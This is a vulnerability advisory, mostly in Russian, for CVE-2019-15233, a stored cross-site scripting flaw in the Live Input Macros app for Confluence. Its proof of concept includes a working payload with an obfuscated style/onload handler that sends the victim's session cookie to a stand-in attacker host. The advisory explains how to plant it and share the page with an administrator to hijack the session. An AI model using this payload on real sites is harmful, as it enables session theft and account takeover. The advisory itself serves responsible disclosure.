
(FAB-2019-00157) Уязвимость, обнаруженная мной CVE-2019-15233
(FAB-2019-00157) Уязвимость, обнаруженная мной, CVE-2019-15233
Рекомендация: advisory
Advisory ID: FAB-2019-00157
Product: Live Input Macros
Manufacturer: Old Street Solutions
Affected Version(s): 2.10 and before
Tested Version(s): 2.10
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
CVSS v3.0: 7.6
Vektor String: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Vendor Homepage: https://www.oldstreetsolutions.com/
Software Link: https://marketplace.atlassian.com/apps/1215287/live-input-macros
Solution Status: Reported
Manufacturer Notification: 2019-08-19
Solution Date: 2019-08-20
Public Disclosure: 2019-08-20
CVE Reference: CVE-2019-15233
Author of Advisory: Francesco Emanuel Bennici, FABMation GmbH
Эта уязвимость была обнаружена Francesco Emanuel Bennici [email protected] из FABMation GmbH.
Live Input Macros предоставляет пользователям возможность добавлять флажки, переключатели, раскрывающиеся списки и другие элементы на страницы Confluence и вносить изменения без редактирования страницы.
Злоумышленник может выполнить JavaScript-код на сайте Confluence, если пользователь добавит вредоносный код.
Это можно использовать для кражи cookie сеанса (например) администратора (перехват сеанса).
Скопируйте этот контент:
Hello World this is my Text Box </p> </div>
alksdfjlkasdjflkj </p> " <br/> <style/onload=window.location=atob("aHR0cDovL2V2aWwuc2l0ZS8/PQ==")+document.cookie> <br/> " <p> asdasd
Затем создайте новый элемент на странице Confluence. Вставьте в него этот текст и поделитесь страницей Confluence с (например) системным администратором, и если он откроет сайт, вы сможете перехватить/«скопировать» его сеанс.